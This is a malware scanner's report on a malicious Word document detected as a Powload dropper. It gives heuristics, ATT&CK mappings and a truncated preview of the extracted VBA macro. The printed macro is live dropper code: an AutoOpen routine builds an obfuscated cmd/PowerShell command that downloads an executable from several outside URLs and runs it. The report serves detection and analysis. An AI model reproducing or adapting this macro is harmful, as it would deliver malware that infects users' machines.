MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function to execute a command, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Dropper.Powload-6670769-0' further supports its role as a dropper. The specific command constructed by the VBA script is too obfuscated to fully reconstruct, but its intent is clear.
Heuristics 6
-
ClamAV: Doc.Dropper.Powload-6670769-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Powload-6670769-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5147 bytes |
SHA-256: 25e65ad1d0e19a60d99916ec73025c8c382e0614a94718e946c4bede45529fda |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mOiOWtjlRGEqz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "waLVlBTpcfZp" + "jIwaYXpYTwGaz" + "6721" + "mj"
Hour "mZ" + "Zz" + "a" + "BMZzvXC"
VBA.Shell KeyString(1 + 1 + 6 + 6 + 53) + zzBRfwBYEjWaBj + QCVwfERcbFu + vnwiaSvkPs + vsjJsvOEk + djvQmF + hFZkZqwirQdXzl + XFrrYWhiwUufZp, 85 - 85
Hour "392901315" + "iz"
Hour "sKB" + "1157"
Hour "P" + "141548016"
End Sub
Attribute VB_Name = "rbfTcfDzDtXK"
Function vnwiaSvkPs()
On _
Error _
Resume _
Next
Hour "PjtjzId" + "101243122"
Hour "448" + "pfjMo" + "519588971" + "jTbSH"
Hour "wlX" + "MjiIkWOorwMn" + "360281189" + "fiKBUdimSmfjZO"
zMslGJ = "md /V/" + "C" + Chr(4 + 5 + 1 + 2 + 22) + "^s^et" + " ^U" + "J=^ " + "^ ^ ^" + " " + " ^ ^" + " ^ ^}^" + "}{^" + "hc^t^a" + "c}^;^k" + "a" + "er"
Hour "9149464" + "JuiPaEONMJaYKi"
Hour "wZiWwMzvYaDEln" + "OjSz" + "WwKMBNNcv" + "W"
Hour "88703812" + "GzXFpZ"
Hour "IsEtwDbL" + "iBc"
EazrLpRzsl = "^b^;iE" + "^z" + "$^ " + "m^et" + "^I^-" + "ekovn^I" + "^;)" + "iEz$"
Hour "YX" + "Bb"
YBIjUnock = "^ ^," + "AZ" + "Q$(el" + "i^Fd^ao" + "^"
Hour "UkzV" + "443443375"
KDlpRIZ = "lnwoD^" + ".^" + "b^t^" + "T${yrt" + "^{)O^" + "SU^$ n" + "^i^ AZ^" + "Q$"
Hour "4149" + "wG"
Hour "Q" + "b"
DaajuwukLWi = "(^hc" + "^ae" + "r^o^f^;" + "^'e" + "^xe" + "^.'+^PQ" + "r^$" + "^+^'" + "^\^'^" + "+cilbup" + ":vne^" + "$" + "=^i^E"
Hour "198927999" + "qfuVldzMuiu"
Hour "44365992" + "3034" + "Ko" + "56341495"
dXpdJNUDzW = "^z" + "$;^'^25" + "^5^' ^" + "= P^Q" + "r" + "$^;)^'@" + "'(t" + "i^lpS^."
Hour "409008215" + "1969" + "307815277" + "9456"
Hacbljizh = "^'" + "wA^l^" + "K^m2D9" + "/ia1^p-" + "-n^x^"
Hour "8413" + "jiiF"
Hour "sM" + "XHCHZsKSKol"
phALirqOuLu = ".lp" + "e^eib^" + "5^a^" + "b^fb" + "a" + "1"
Hour "SDoOatJRRSNSL" + "zp"
Hour "IR" + "8728" + "jSb" + "Js"
Hour "160" + "416393140" + "zBAsWXwAM" + "oYUdbK"
Hour "524232069" + "tEEN"
jZAbDhHSmJ = "b^" + "-" + "^-n" + "^x//:pt" + "t^h^" + "@f" + "^" + "7"
vnwiaSvkPs = zMslGJ + EazrLpRzsl + YBIjUnock + KDlpRIZ + DaajuwukLWi + dXpdJNUDzW + Hacbljizh + phALirqOuLu + jZAbDhHSmJ
Hour "AJtkR" + "XFuz"
Hour "454255615" + "H" + "129906426" + "664"
Hour "njPj" + "a" + "Qi" + "dM"
End Function
Function vsjJsvOEk()
On _
Error _
Resume _
Next
Hour "414068439" + "1912" + "6606" + "Lhjo"
Hour "nGiSEZXpWrmV" + "rbKbuAPovnJp" + "38225789" + "qFQWjGqAjzMjRp"
Hour "642" + "liYV" + "KDW" + "nJd"
VfKXlwfIfw = "VRQ^k^H" + "/" + "^ur^.^k" + "^i^" + "timc//:" + "^p^t^t^" + "h@ke" + "s^P3" + "^d/" + "r^b^.m"
Hour "Ttj" + "a"
Hour "3356" + "jRY" + "H" + "fqHczv"
Hour "YMPc" + "DsSY"
GFClXuqciwH = "^" + "oc^.^" + "avi^tc^" + "enocr" + "^e"
Hour "J" + "ETbQmRsKJ"
Hour "495940740" + "JsKUif" + "9213" + "rjnDJGiWL"
fPLTEGI = "^t" + "n^i//" + "^" + ":^p" + "t^th@"
Hour "ciAVpUnBJknY" + "923"
Hour "apRtiMnmh" + "341892734"
Hour "fFIjq" + "299500210" + "BztQvKr" + "EoWYfW"
kjqdaPui = "^u0^" + "Ozr9^" + "w" + "/" + "moc.ecs" + "iped/"
Hour "p" + "341678073"
Hour "Dnk" + "bjjfSP"
Hour "1352" + "48910898"
JBwwkcPmjD = "/^:ptth" + "^@Z/m" + "oc.n^eh" + "sahkl^a" + "//^"
Hour "NtzVDaXiMzd" + "w"
Hour "bVO" + "ESjD"
Hour "iIk" + "h"
Hour "281174876" + "iO" + "RATPzjw" + "71153388"
Hour "298306037" + "AS" + "BPdp" + "dIlpHVqi"
ztUiwzpAj = ":^p^" + "tt^h'^=" + "OS^U^$;" + "tn^" + "e^i^lC" + "^b" + "e^W" + "^.t^eN "
Hour "JIllhVEJk" + "491394751" + "4698" + "wrPzHsfd"
ENCTDZBGaW = "t" + "ce" + "j^bo-^" + "w^e" + "n=bt^" + "T^$^" + " l^" + "le" + "hsr^" + "e^w^op"
Hour "962" + "tXUU" + "Go" + "naUA"
TdsTrUSz = "&" + "&f" + "or " + "/^L %^9" + " ^in" + " (36" + "4^,"
vsjJsvOEk = VfKXlwfIfw + GFClXuqciwH + fPLTEGI + kjqdaPui + JBwwkcPmjD + ztUiwzpAj + ENCTDZBGaW + TdsTrUSz
Hour
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.